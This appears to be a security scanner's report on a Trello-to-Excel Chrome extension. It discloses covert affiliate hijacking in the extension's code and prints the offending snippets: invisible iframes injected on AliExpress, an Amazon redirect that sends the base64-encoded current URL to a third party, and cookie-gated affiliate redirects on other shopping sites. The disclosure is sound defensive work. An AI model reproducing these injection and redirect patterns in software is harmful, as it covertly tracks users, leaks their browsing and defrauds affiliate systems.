Security Alert: Critical Security Risk
Official Export Excel for Trello
ID: dblnlgpkeilnnoggnilfkibbcamilchn
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- Henrique BrugugnoliView Profile
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Official Export Trello Boards to Excel
Export your board and cards for Excel FREE and you dont need to pay for that.
On AliExpress pages the content script injects a 1×1 invisible iframe loading affiliate tracking URLs on pwieu.com. This covertly signals to the affiliate network that the user visited from this publisher's link, generating commissions without any user awareness or CWS-disclosed consent. pwieu.com is an unrelated third-party affiliate redirect service with no connection to Trello or Excel export.
if (url.href.indexOf("best.aliexpress.com") > 0) { $('body') .append( '<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title></title> </head> <body><iframe src="https://pwieu.com/click-CQEXU0O6-KIGQB9TF?bt=25&tl=1&sa=EXT" height="1" width="1" frameborder="0"></iframe></body></html>' );} else if (url.href.indexOf("aliexpress.com") > 0) { $('body') .append( '<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title></title> </head> <body><iframe src="https://pwieu.com/click-KHQ8E5F0-MKIGQNPP?bt=25&tl=1&sa=EXT" height="1" width="1" frameborder="0"></iframe></body></html>' );}On Amazon the user's current URL is base64-encoded and forwarded to buscacupom.tec.br (leaking the browsing URL to a third-party), then the user is silently redirected to that domain. On Alibaba, Fiverr, and multiple Brazilian retailers (via redir.lomadee.com, stvkr.com) the extension redirects window.location to publisher-specific affiliate tracking links. Cookie gating limits this to once every three days per site, making it less obvious. None of these destinations or behaviors are disclosed in the extension's CWS data-collection declaration; the current URL is transmitted to third-party affiliate networks without user consent.
} else if (url.href.indexOf(".amazon.") > 0) { if (controlCoockie("amazon5", 3)) { window.location.href = "http://buscacupom.tec.br/amazon/offer/offerView.php?url=" + window.btoa(url); }} else if (url.href.indexOf(".americanas.com.br") > 0) { urlLoc = "https://redir.lomadee.com/v2/deeplink?sourceId=36886602&url=" + url; if (controlCoockie("americanas", 3)) { window.location.href = urlLoc; }} else if (url.href.indexOf(".alibaba.com") > 0) { urlLoc = "http://stvkr.com/click-AQDMVFHK-KIGQCMO1?bt=25&tl=1&url=" + url; if (controlCoockie("alibaba", 3)) { window.location.href = urlLoc; }} else if (url.href.indexOf(".fiverr.") > 0) { urlLoc = "https://stvkr.com/click-GQRNSFTO-KIGQCOB2?bt=25&tl=1&url=" + url; if (controlCoockie("fiverr", 3)) { window.location.href = urlLoc; }}The bundled manifest declares manifest_version 2 with content scripts injected into every HTTP/HTTPS page, while the live CWS listing reports manifest_version 3. This discrepancy indicates the ZIP delivered to users is older and broader than what Google's store listing implies. The all-sites injection scope is necessary for the covert affiliate hijacking code to fire on shopping domains.
{ "manifest_version": 2, "content_scripts": [ { "matches": [ "http://*/*", "https://*/*" ], "js": [ "lib/jquery-2.1.0.min.js", "lib/FileSaver.js", "lib/xlsx.js", "lib/jszip.min.js", "trelloexport.js" ] } ]}By severity
Versions scanned
Showing 1 of 19 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 2.0 | 3 |
Files with findings
2 distinct paths — top paths by unique finding count:
- trelloexport.js2
- manifest.json1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.